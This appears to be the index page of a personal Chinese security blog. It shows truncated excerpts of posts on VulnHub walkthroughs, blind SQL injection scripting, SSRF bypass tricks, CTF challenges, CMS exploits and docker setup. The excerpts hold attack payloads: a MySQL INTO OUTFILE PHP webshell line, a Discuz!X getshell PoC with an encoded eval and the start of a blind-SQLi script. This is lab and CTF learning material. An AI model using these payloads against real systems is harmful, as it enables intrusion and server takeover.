NEKO

NEKO

superficial aesthetics

vulnhub-Freshly
主机扫描1netdiscover -r 10.10.10.0/24 (同一个局域网内) 或者1nmap -sP 10.10.10.0/24 确认主机ip:10.10.10.188 服务扫描1nmap -sS -Pn -T4 10.10.10.188 3个服务:12380/tcp open http443/tcp open https8080/tcp open http-proxy 对端口进行详细探测1nmap -A -O -p80,443,8080 10.10.10.188 12345678910111213PORT STATE SERVICE VERSION8...
vulnhub-FristiLeaks
在公司闲着摸鱼划水,正好看到红日团队做过这系列的教程,于是打算动笔自己也记录一下. 主机扫描1netdiscover -r 10.10.10.0/24 (同一个局域网内) 或者1nmap -sP 10.10.10.0/24 确认主机ip:10.10.10.188 服务扫描1nmap -sS -Pn -T4 10.10.10.188 -sS:SYN扫描 -Pn:不进行Ping操作,将所有指定的主机视作开启的,跳过主机发现的过程 -T4:–T:设置时间模板,分别与数字0-5对应;前两种模式用于IDS躲避,Polite模式降低了扫描 速度以使用更少的带宽和目标主机资源。默认模式为Norm...
sql blind inject summary
抽空把sql盲注的姿势总结下. 以sqli-labs为例. sleep()被禁就用BENCHMARK(10000000,SHA(‘1’)) 含’,’,不含or12345678910111213import requestsurl='http://127.0.0.1/sqli-labs-master/Less-1/index.php'result=''for j in range(1,50): for i in range(33, 125): url1=url+"?id=1' and if(substr((select bina...
知识点随笔记
创建时间:2018-1-25 菜猫进化!->大菜猫(:з」∠) 文件包含当base64被waf时可以使用其他过滤器,比如:1/?file=php://filter/read=string.rot13/resource=flag.php sqli tricksxss和sql注入的最大区别:xss针对客户端的,sql注入是针对服务器的. dic=string.ascii_letters+string.digits+string.punctuation.replace(‘.’,’’) binary可区分大小写:url = "http://120.24.86.145:9004/...
PHP-SSRF绕过tricks
环境:PHP 7.0.12 利用URL保留字符测试代码:1234567891011121314151617<?php$url = $argv[1];if (filter_var($url, FILTER_VALIDATE_URL)) { $r = parse_url($url); print_r($r); echo "---------------------------------------------------\n"; if (preg_match('/baidu\.com$/', $r['host'])) { exec('curl -v -s "' ...
mysql->webshell
参考:http://www.freebuf.com/column/143125.htmlhttp://url.cn/5Oqx2CM 最简单的方法直接1select '<?php @eval($_POST[neko]);?>'INTO OUTFILE 'D:/phpStudy/PHPTutorial/WWW/neko.php'; 不过mysql一般会开启–secure-file-priv选项。查看secure_file_priv:1SHOW VARIABLES LIKE '%secure_file_priv%'; 参数...
自己写得题目ORZ
SQL注入sqli1源码:12345678910111213141516171819202122<?phperror_reporting(0);$conn = mysql_connect('127.0.0.1', 'root', 'root') or die("could not connect:" . mysql_error());mysql_select_db('neko_web1', $conn) or die('can not use:' . mysql_...
cms-vul
都是能百度到的,用到了就记一下. Discuz!X升级getshellpoc:123url:http://www.xxx.net/utility/convert/index.php?a=config&source=d7.2_x2.0post:a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%281...
docker入门
xman2018 pratice的web1的dockerfile写的很好。方法貌似不能用了,参考这个:https://www.cnblogs.com/tianhei/p/7802064.html 推荐教程:docker从入门到实践 https://blog.csdn.net/wy_97/article/details/78984101 docker安装:12345678910# step 1: 安装必要的一些系统工具sudo apt-get updatesudo apt-get -y install apt-transport-https ca-certificates curl so...
n3k0
incisive expression